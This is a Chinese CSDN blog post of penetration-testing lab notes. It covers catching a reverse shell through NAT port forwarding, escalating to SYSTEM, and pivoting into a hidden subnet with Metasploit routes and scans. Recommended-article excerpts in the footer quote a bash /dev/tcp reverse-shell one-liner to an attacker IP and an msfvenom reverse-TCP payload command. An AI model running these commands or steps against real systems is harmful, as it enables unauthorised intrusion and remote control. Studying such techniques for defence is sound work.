test信息收集8(反弹给内网shell和做跳板机)

最新推荐文章于 2022-11-27 20:05:11 发布
最新推荐文章于 2022-11-27 20:05:11 发布
阅读量302 收藏
点赞数 1
分类专栏: 笔记 文章标签: linux
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_45300786/article/details/112107228
版权

先做个反弹shell
在这里插入图片描述
开启http服务,让靶机访问
在这里插入图片描述
然后靶机访问,下载shell
在这里插入图片描述
这里差个题外话,因为我们这里使用的是4444端口,也就是NAT转发的端口,所以用完之后,我们要马上关闭,不然后面就用不了了,
当然你也可以新开一个NAT转发端口

然后kali

这里就要这是自己的ip和端口了,因为NAT转发了
在这里插入图片描述
然后去触发shell
在这里插入图片描述
成功获取到shell
在这里插入图片描述
直接获取system权限
在这里插入图片描述

这里我嗯再来做个跳板机

在这里插入图片描述
之前我们是通过防火墙来访问内部ip的,但是如果内网里面有新的网段,那就访问不了了,因为防火墙不知道这这个103网段

在这里插入图片描述
在这里插入图片描述

想访问就必须添加路由
先配置103段主机
在这里插入图片描述
跳板机2个网段
在这里插入图片描述

在这里插入图片描述
可以在跳板机上看到103段
在这里插入图片描述
在这里插入图片描述
打印出来,看是否连接上了
在这里插入图片描述

在这里插入图片描述
来扫描一下这个网段,成功把103.128这台主机扫出来了
在这里插入图片描述

在这里插入图片描述

使用nmap扫描漏洞失败

原因是使用msf本身是走的路由,而使用插件nmap没走路由
在这里插入图片描述

樱浅沐冰
关注
  • 1
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
内网渗透之内网信息收集(一)
不知名白帽的博客
06-26 1087
内网渗透之内网信息收集(一)(01msf反弹shell、02msf反弹shell、03通过shell关闭防火墙、04关闭杀毒软件)。
shell 工具_黑客工具:大小仅30K,网络探测端口扫描shell反弹!速来补习
weixin_39952182的博客
12-05 119
前言小助手今天说的这个工具,是Linux下网络探测必备,在故障排查,远程连接中,简单方便,配上管道符操作,可以组装成强大的功能。他就是 Nmap 工具包内的 Ncat。介绍Netcat是用于跨TCP和UDP端口读写数据的实用程序。它可以用来很多很酷的事情,比如文件传输,端口扫描,端口重定向,回溯别人的电脑,制作一个简单的聊天程序,用于网络故障排除等等,这就是为什么它被称为瑞士军刀。此外,现在几乎...
反弹shell原理与实现
hengliang_的博客
03-09 1845
什么是反弹shell?   反弹shell(reverse shell),就是控制端监听在某TCP/UDP端口,被控端发起请求到该端口,并将其命令行的输入输出转到控制端。reverse shell与telnet,ssh等标准shell对应,本质上是网络概念的客户端与服务端的角色反转。 为什么要反弹shell? 通常用于被控端因防火墙受限、权限不足、端口被占用等情形。 举例:假设我们攻击了一台机器,打开了该机器的一个端口,攻击者在自己的机器去连接目标机器(目标ip:目标机器端口),这是比较常规的.
内网 linux 反弹shell,安全实验室 | 内网渗透—利用WinRM实现端口复用&反弹SHELL
weixin_39539807的博客
05-13 423
WinRM(Windows Remote Management)是Windows远程管理的简称,WinRM基于Web服务管理(WS-Management)标准,使用80和443端口,可以在对方开启防火墙的情况下远程管理目标机。在Windows Server 2008 R2以上的系统中都默认开启该服务。如果防御者配置不当,攻击者在内网渗透中很可能会利用WinRM实现端口复用,进而实现内网无文件攻击反...
内网穿透】Frp 自建跳板-两个内网通讯上线-反弹shell
面向感觉挖洞,背向对象编程。欢迎关注VX公众号:EureKa安全团队
06-24 1986
Frp自建跳板,实现两个内网通讯上线并反弹shell内网frp穿透技术小记。
eNetTest 网管内网单机测速工具
06-01
eNetTest 网管内网单机测速工具eNetTest 网管内网单机测速工具eNetTest 网管内网单机测速工具eNetTest 网管内网单机测速工具eNetTest 网管内网单机测速工具eNetTest 网管内网单机测速工具eNetTest 网管内网单机测速...
Shell脚本test命令使用总结和实例
09-15
Shell脚本编程中,`test`命令是一个非常重要的工具,它允许我们基于特定的条件进行判断,并根据结果执行相应的操作。本文将深入探讨`test`命令在数字测试、字符串测试以及文件测试中的应用,并通过实例来加深理解...
eNetTest 网管内网单机测速.zip
09-02
《eNetTest网管内网单机测速工具详解及应用》 在信息化时代,网络管理成为企业运营中不可或缺的一部分。高效、准确地监控网络性能是保障业务顺畅进行的关键。针对这一需求,eNetTest网管内网单机测速工具应运而生。...
Linux shell中的test命令用法教程
01-10
test命令是shell环境中测试条件表达式的实用工具,下面来看看test命令的用法介绍: 语法 test(选项) 选项 -b<文件>:如果文件为一个块特殊文件,则为真; -c<文件>:如果文件为一个字符特殊文件,则为真...
eNetTest 网管内网单机测速工具.zip
06-10
《eNetTest网管内网单机测速工具——深入解析与应用》 eNetTest是一款专为网络管理员设计的内网测速工具,它能够帮助用户快速、准确地了解网络环境下的单机性能,从而优化网络配置,提高工作效率。这款软件的核心...
Kali 脚本应用 (一)
最新发布
君逍遥o
11-27 671
kali 脚本应用
反弹shell
litiammmm的博客
07-29 848
感谢:https://zhuanlan.zhihu.com/p/138393396 https://www.cnblogs.com/iouwenbo/p/11277453.html 什么是反弹shell?   反弹shell(reverse shell),就是控制端监听在某TCP/UDP端口,被控端(普通人)发起请求到该端口,并将其命令行的输入输出转到控制端(黑客)。reverse shell与telnet,ssh等标准shell对应,本质上是网络概念的客户端与服务端的角色反转。 为什么要反弹s.
反弹shell的各种姿势(linux与windows)
weixin_42478365的博客
06-19 1028
在渗透过程中,往往因为端口限制而无法直连目标机器,此时需要通过反弹shell来获取一个交互式shell,以便继续深入。 反弹shell是打开内网通道的第一步,也是权限提升过程中至关重要的一步。所有姿势整理自网络,假设,攻击者主机为:192.168.99.242,本地监听1234端口,如有特殊情况以下会备注说明。 Linux 反弹shell 姿势一:bash反弹 bash -i >& /dev/tcp/192.168.99.242/1234 0>&1 base64版:bash -
内网渗透之隐藏通信隧道技术
qq_48904485的博客
04-27 5217
一、隐藏通信隧道基础知识 1、隐藏通信隧道概述 一般的网络通信,先在两台机器之间建立TCP连接,然后进行正常的数据通信。在知道IP地址的情况下,可以直接发送报文;如果不知道IP地址,就需要将域名解析成IP地址。在实际的网络中,通常会通过各种边界设备、软/硬件防火墙甚至人侵检测系统来检查对外连接的情况,如果发现异常,就会对通信进行阻断。 这里的隧道,是一种绕过端口屏蔽的通信方式。防火墙两端的数据包通过防火墙所允许的数据包类型或者端口进行封装,然后穿过防火墙,与对方进行通信。当被封装的数据包到达目的地时,将数据
第一天:基础入门-操作系统&名词&文件下载&反弹SHELL&防火墙绕过
m0_51322401的博客
11-23 612
反弹反弹shell(reverse shell),就是控制端监听在某TCP/UDP端口,被控端发器请求到该端口,并将其命令行的输入输出转到控制端。reverse shell与telnet,ssh等标准shell对应,本质上是网络概念的客户端与服务端的角色反转。是在硬件、软件、协议的具体实现或系统安全策略上存在的缺陷,从而可以使攻击者能够在未授权的情况下访问或破坏系统。Payload:中文"有效载荷",指成功exploit之后,真正在目标系统执行的代码或指令(漏洞利用成功后的形式,或者说通道)。
后渗透——内网转发之反弹shell
爱国小白帽
03-16 3346
内网转发目的 渗透测试中,我们往往会面对十分复杂的内网环境。比如最常用的防火墙,它会限制特定端口的数据包出入。 内网转发三种形式 反弹shell 在攻击者机器,获取受害者机器的命令行 反弹端口 受害者服务器的某一个端口不能访问,我们通过反弹端口的形式,让攻击者能够访问该端口 也叫端口转发 反弹代理 将攻击者的流量,转发到内网其他服务器上 实验环境: 瑞士军刀nc Windows ...
正向shell反弹shell
weixin_45936149的博客
03-26 9457
正向shell反弹shell的利用场景以及使用技巧
msf反弹shell
cj_Hydra's Blog
02-01 1470
windows+exe反弹 使用msfvenom模块生成一个被控端的客户端文件,这里用windows 64为例(如果不加x64,则默认是32位),此时就会生成一个shell.exe的程序。 msfvenom -p windows/x64/meterpreter_reverse_tcp lhost=攻击机ip地址 lport=监听端口 -f exe >shell.exe 在攻击机的m...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值